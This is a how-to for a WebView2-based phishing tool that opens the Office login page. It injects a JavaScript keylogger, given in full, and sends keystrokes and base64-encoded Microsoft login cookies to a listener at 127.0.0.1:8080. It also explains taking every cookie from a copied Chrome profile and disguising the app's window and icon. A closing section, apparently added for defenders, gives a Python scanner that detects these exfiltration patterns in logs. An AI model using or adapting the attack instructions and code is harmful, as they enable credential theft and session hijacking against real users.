Instructions for using the attack using WebView2

Man

Usage

Tested on Windows 10 and 11.

When executed, the binary loads https://office.com/login. A JavaScript keylogger is injected into each page and keystrokes are sent to http://127.0.0.1:8080. Additionally, upon successful user authentication, the cookies for login.microsoftonline.com are base64-encoded and sent to http://127.0.0.1:8080 via an HTTP GET request.

Changing JavaScript

If you want to change the JavaScript, the code you need to change is at line 1096 in AppWindow.cpp and is shown below.

Code:
coreWebView2->AddScriptToExecuteOnDocumentCreated(L"var link = \"http://127.0.0.1:8080/keylog?k=\";var l = \"\";document.onkeypress = function (e){l += e .key;var req = new XMLHttpRequest();req.open(\"GET\",link.concat(l), true);req.send();}", nullptr);

Chrome cookie theft

WebView2 allows you to launch with an existing user data folder (UDF) instead of creating a new one. The UDF contains all the passwords, sessions, bookmarks, etc. Chrome's UDF is located at C:\Users\<username>\AppData\Local\Google\Chrome\User Data. We can simply tell WebView2 to launch an instance using this profile and, on startup, extract all the cookies and pass them to the attacker's server.

The only catch is that WebView2 looks for a folder named EBWebView instead of User Data (not sure why). Copy the User Data folder and rename it to EBWebView.

Necessary changes

  • On line 41 in app.cpp: change std::wstring userDataFolder(L""); to std::wstring userDataFolder(L"C:\\Path\\To\\Temp");
    The specified folder must contain the EBWebView folder, from which WebView2 will read.
  • On line 40 in ScenarioCookieManagement.cpp: change GetCookiesHelper(L"https://login.microsoftonline.com"); to GetCookiesHelper(L"");

When GetCookiesHelper is called without specifying any website, it retrieves all cookies.

Note: This will not work with the current application if there are a large number of cookies, because the application sends them using a GET request, which has a limited length.

Important functions

If you want to make changes to the binary, you will find information about important functions below.
  • AppStartPage.cpp - the GetUri() function contains the URL that is loaded when the binary runs.
  • ScenarioCookieManagement.cpp - the SendCookies() function contains the IP address and port to which cookies are sent.
  • AppWindow.cpp - the CallCookieFunction() function waits until the URL starts with https://www.office.com/?auth= and then calls ScenarioCookieManagement::GetCookiesHelper(L"https://login.microsoftonline.com").
  • WebView2APISample.rc - cosmetic changes. Remove the menu bar by setting all POPUP values to "".
    Change IDS_APP_TITLE and IDC_WEBVIEW2APISAMPLE. This is the name of the application in the title bar.
    Change IDI_WEBVIEW2APISAMPLE, IDI_WEBVIEW2APISAMPLE_INPRIVATE and IDI_SMALL. They point to the .ico file that is the icon for this application.
  • Toolbar.cpp - itemHeight should be set to 0 to remove the top menu. This is already taken care of in this code.
  • AppWindow.cpp - LoadImage() should be commented out. This hides the blue splash screen. This is already taken care of in this code.
  • App.cpp - in new AppWindow(creationModeId, WebViewCreateOption(), initialUri, userDataFolder, false);, change the last parameter value to true. This will hide the toolbar. This is already taken care of in this code.
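
A defender-side companion to the post above: an added Python example, not the post's code and not part of the WebView2 sample, that scans a URL or proxy log for the two exfiltration shapes the post describes. The first is the keylogger's stream of GET requests whose k= value grows by one character per keystroke (the l += e.key buffer in the injected script); the second is a single GET carrying a long base64 blob that decodes to cookie name=value text. Only the /keylog?k= path and the base64 encoding of the cookies come from the post; the log line format, the thresholds MIN_RUN and MIN_BLOB_LEN, the /cookies path, the c= parameter name and the cookie text are constructed assumptions, since the post does not show the cookie request's exact shape.

```python
"""Scan a URL log for the two exfiltration patterns described in the post:
keystroke accumulation over repeated GETs and a base64-encoded cookie blob."""
import base64
import binascii
import re
from collections import defaultdict
from urllib.parse import parse_qsl, quote, urlsplit

MIN_RUN = 3        # growing values in a row before flagging (assumption)
MIN_BLOB_LEN = 64  # shortest query value treated as a possible cookie blob (assumption)

# Constructed cookie text; the post does not show the real cookie format.
COOKIE_TEXT = "session=AbCdEf0123456789; persist=GhIjKl9876543210; lang=en"
COOKIE_BLOB = quote(base64.b64encode(COOKIE_TEXT.encode()).decode(), safe="")

# Constructed sample log, not real traffic: "<timestamp> <client> <method> <url>".
SAMPLE_LOG = [
    "2024-01-01T10:00:01 10.0.0.5 GET http://127.0.0.1:8080/keylog?k=p",
    "2024-01-01T10:00:02 10.0.0.5 GET http://127.0.0.1:8080/keylog?k=pa",
    "2024-01-01T10:00:03 10.0.0.5 GET http://127.0.0.1:8080/keylog?k=pas",
    "2024-01-01T10:00:04 10.0.0.5 GET http://127.0.0.1:8080/keylog?k=pass",
    "2024-01-01T10:00:05 10.0.0.5 GET https://login.microsoftonline.com/common/oauth2/authorize?client_id=abc&state=xyz",
    "2024-01-01T10:00:09 10.0.0.5 GET http://127.0.0.1:8080/cookies?c=" + COOKIE_BLOB,
    "2024-01-01T10:00:10 10.0.0.7 GET https://www.office.com/?auth=2",
]

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)$")


def parse_line(line):
    """Split one log line into its fields and decoded query parameters."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    u = urlsplit(m["url"])
    return {
        "ts": m["ts"], "client": m["client"], "method": m["method"],
        "host": u.netloc, "path": u.path,
        "params": parse_qsl(u.query, keep_blank_values=True),
    }


def decode_cookie_blob(value):
    """Return the decoded text if value is a base64 blob of cookie-like
    'name=value' text, otherwise None."""
    if len(value) < MIN_BLOB_LEN or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", value):
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    if not text.isprintable() or "=" not in text:
        return None
    return text


def find_exfil(lines):
    """Return findings for keystroke accumulation and cookie blobs in GET queries."""
    findings = []
    # (client, host, path, param) -> (last value seen, length of the growing run)
    runs = defaultdict(lambda: (None, 0))
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "GET":
            continue
        for name, value in rec["params"]:
            key = (rec["client"], rec["host"], rec["path"], name)
            last, run = runs[key]
            # l += e.key in the injected script makes each value extend the previous one
            grows = last is not None and value.startswith(last) and len(value) > len(last)
            run = run + 1 if grows else 1
            runs[key] = (value, run)
            if run == MIN_RUN:
                findings.append({"type": "keystroke_accumulation", "ts": rec["ts"],
                                 "client": rec["client"], "url": rec["host"] + rec["path"],
                                 "param": name})
            decoded = decode_cookie_blob(value)
            if decoded is not None:
                findings.append({"type": "cookie_blob", "ts": rec["ts"],
                                 "client": rec["client"], "url": rec["host"] + rec["path"],
                                 "param": name, "decoded": decoded})
    return findings


if __name__ == "__main__":
    for f in find_exfil(SAMPLE_LOG):
        print(f["ts"], f["client"], f["type"], f["url"], f["param"])
```

The accumulation check keys on client, host, path and parameter name, so it fires on the growing-prefix shape itself rather than on the /keylog path or the 127.0.0.1:8080 destination, which are trivially changed in the source; the cookie check likewise looks at the decoded content rather than the URL. Both are cheap enough to run over a full day of proxy logs.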
 